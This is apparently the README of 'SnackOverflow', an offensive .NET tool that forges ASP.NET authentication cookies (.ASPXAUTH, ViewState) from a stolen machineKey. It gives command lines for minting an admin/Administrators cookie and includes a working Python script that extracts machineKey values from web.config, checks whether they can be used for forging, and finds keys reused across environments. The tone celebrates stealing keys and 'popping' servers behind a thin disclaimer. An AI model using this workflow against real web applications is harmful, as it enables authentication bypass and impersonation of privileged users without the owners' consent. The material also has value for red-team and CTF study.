scriptkittens

đŸȘ **SnackOverflow**

Because sometimes you just want to forge some cookies and watch the world burn.

(image: Yummy) Gatos love cookies.

What SnackOverflow is

Disclaimer: This tool is for educational purposes only. Use it at your own risk. Don’t be a jerk and use it to exploit someone without their consent.

SnackOverflow is a .NET tool for when you’ve stolen someone’s machineKey and you’d like to make them regret their poor configuration choices.

It forges ASP.NET cookies, and not just boring old .ASPXAUTH: also __VIEWSTATE, ASP.NET_SessionId, and whatever other baked good you can dream up.

Basically, it’s the part of the red-team toolkit that says:

“What if I could bake trust instead of stealing it?”


How SnackOverflow works

SnackOverflow parses a web.config (or takes keys directly) and reproduces Microsoft's legacy Encrypt + HMAC process, the one you get with compatibilityMode="Framework20SP2" rather than the newer .NET 4.5 data-protection pipeline. No black magic, no dependencies, just crypto and sarcasm.

Under the hood it:

  1. Reads your machineKey values (from file or CLI args)
  2. Serializes a legit-looking Forms Auth ticket
  3. Encrypts it with the configured decryption algorithm (AES / DES / 3DES) and signs it with the configured validation algorithm (HMACSHA256 in the example below)
  4. Prints you a shiny hex string you can drop into your requests

That’s it. No setup, no dependencies, no remorse.


Using SnackOverflow

SnackOverflow --config web.config --user admin --group Administrators

or if you already know the keys:

SnackOverflow \
  --decryptionkey A1B2C3... \
  --validationkey F1E2D3... \
  --user admin --group Administrators

Optional args let you override the encryption/validation algorithm, because sometimes Microsoft didn’t get the memo about consistency.


Output

Each run spits out multiple cookies, for your convenience:

  • Forms Authentication Cookie (.ASPXAUTH)
  • Session Cookie (ASP.NET_SessionId)
  • Custom Encrypted Cookie (because you can)
  • ViewState Cookie (__VIEWSTATE, but cooler)

Two caveats before you get excited: ASP.NET_SessionId is an opaque random identifier that the machineKey never signs, so a made-up one only lands you in a session the server already has; and __VIEWSTATE normally travels as a hidden form field in the POST body, not a cookie, even though its MAC does come from the validationKey.

If it fails, it tells you why, usually in the tone of a disappointed cat.


Example

Creating Forms Authentication Cookie...
Using Decryption Type: AES256
Using Validation Type: HMACSHA256
Cookie Name: .ASPXAUTH
User: admin
Group: Administrators
Cookie Length: 512 chars

If you see “Error: something something key length,” that’s on you, not me.


Why?

Because sometimes you pop a web server, grab web.config, and realize the app does everything client-side. Because sometimes “machineKey reuse across all dev/test/prod” isn’t just bad, it’s free access. Because why should only the app get to bake cookies?
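The triage script below is an added example and is not SnackOverflow's own code. It covers step 1 of "How SnackOverflow works" (reading the machineKey values out of web.config) together with the checks a practitioner wants before forging anything: whether the keys are really in the file (AutoGenerate means they are not, and IsolateApps means the raw value is not what the server uses), whether they are sizes ASP.NET accepts (the "key length" error the Example section mentions), and, as this section describes, whether the same keys turn up in more than one environment's config. The function names and the sample web.config snippets with their filler keys are invented for the example; the accepted key sizes, attribute defaults and the IsolateApps behaviour are ASP.NET's.

```python
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

# Key sizes in bytes that ASP.NET accepts per decryption algorithm.
DECRYPTION_KEY_SIZES = {
    "AES": {16, 24, 32},
    "DES": {8},
    "3DES": {16, 24},
    "Auto": {8, 16, 24, 32},  # Auto picks DES or AES from the key length
}
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")

def parse_machine_key(xml_text):
    """Return the <machineKey> attributes with ASP.NET's defaults, or None if absent."""
    node = ET.fromstring(xml_text).find("system.web/machineKey")
    if node is None:
        return None
    return {
        "validationKey": node.get("validationKey", "AutoGenerate,IsolateApps"),
        "decryptionKey": node.get("decryptionKey", "AutoGenerate,IsolateApps"),
        "validation": node.get("validation", "HMACSHA256"),
        "decryption": node.get("decryption", "Auto"),
    }

def split_modifier(value):
    """Split 'KEY,IsolateApps' into ('KEY', 'IsolateApps'); the modifier may be ''."""
    key, _, modifier = value.partition(",")
    return key, modifier

def check_machine_key(mk):
    """Return the reasons the keys can't be used for forging as written ([] = good to go)."""
    if mk is None:
        return ["no <machineKey>: keys are auto-generated per server, not in web.config"]
    problems = []
    for attr in ("validationKey", "decryptionKey"):
        key, modifier = split_modifier(mk[attr])
        if key == "AutoGenerate":
            problems.append(f"{attr} is AutoGenerate: not stored in web.config")
            continue
        if modifier == "IsolateApps":
            problems.append(f"{attr} has IsolateApps: ASP.NET mixes the app's virtual "
                            "path into the key, so the raw value alone won't verify")
        if not HEX_RE.match(key) or len(key) % 2:
            problems.append(f"{attr} is not an even-length hex string")
            continue
        nbytes = len(key) // 2
        if attr == "decryptionKey":
            allowed = DECRYPTION_KEY_SIZES.get(mk["decryption"])
            if allowed is None:
                problems.append(f"unknown decryption algorithm {mk['decryption']!r}")
            elif nbytes not in allowed:
                problems.append(f"decryptionKey is {nbytes} bytes but "
                                f"{mk['decryption']} accepts {sorted(allowed)}")
        elif not 20 <= nbytes <= 64:  # ASP.NET enforces 40..128 hex chars
            problems.append(f"validationKey is {nbytes} bytes, must be 20..64")
    return problems

def find_key_reuse(configs):
    """Map each explicit (decryptionKey, validationKey) pair to the configs sharing it."""
    seen = defaultdict(list)
    for label, xml_text in configs.items():
        mk = parse_machine_key(xml_text)
        if mk is None:
            continue
        dec, _ = split_modifier(mk["decryptionKey"])
        val, _ = split_modifier(mk["validationKey"])
        if "AutoGenerate" not in (dec, val):
            seen[(dec.upper(), val.upper())].append(label)
    return {pair: sorted(labels) for pair, labels in seen.items() if len(labels) > 1}

def _config(dec_key, val_key, decryption="AES", validation="HMACSHA256"):
    return ("<configuration><system.web>"
            f'<machineKey decryptionKey="{dec_key}" validationKey="{val_key}" '
            f'decryption="{decryption}" validation="{validation}" />'
            "</system.web></configuration>")

# Constructed sample configs; the keys are repeated filler, not real material.
AES256_KEY = "A1B2C3D4" * 8   # 64 hex chars = 32 bytes
HMAC_KEY = "F1E2D3C4" * 16    # 128 hex chars = 64 bytes
SAMPLE_CONFIGS = {
    "prod": _config(AES256_KEY, HMAC_KEY),
    "dev": _config(AES256_KEY, HMAC_KEY),       # same keys as prod: free access
    "test": _config("AutoGenerate,IsolateApps", "AutoGenerate,IsolateApps"),
    "broken": _config("A1B2C3D4E5", HMAC_KEY),  # 5-byte key, AES wants 16/24/32
    "nokey": "<configuration><system.web/></configuration>",
}

if __name__ == "__main__":
    for label, xml_text in SAMPLE_CONFIGS.items():
        problems = check_machine_key(parse_machine_key(xml_text))
        print(f"{label}: {'forgeable as written' if not problems else problems}")
    for (dec, _), labels in find_key_reuse(SAMPLE_CONFIGS).items():
        print(f"decryptionKey {dec[:8]}... shared by {labels}")
```

Point it at real files by reading each web.config into the dict instead of the constructed samples; a "prod" entry with an empty problem list and a reuse hit against "dev" is exactly the situation this section is talking about.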


Credits

Born from an all-night CTF binge, mythic in scope, where somehow .ASPXAUTH forging was on the checklist.

SnackOverflow is what happens when sleep deprivation, sarcasm, and ASP.NET meet.


Disclaimer

If you’re using this in prod, you’ve already lost. If you’re using this for education or CTFs, carry on, hero.

Don’t be evil. Don’t get sued. Do bake responsibly.
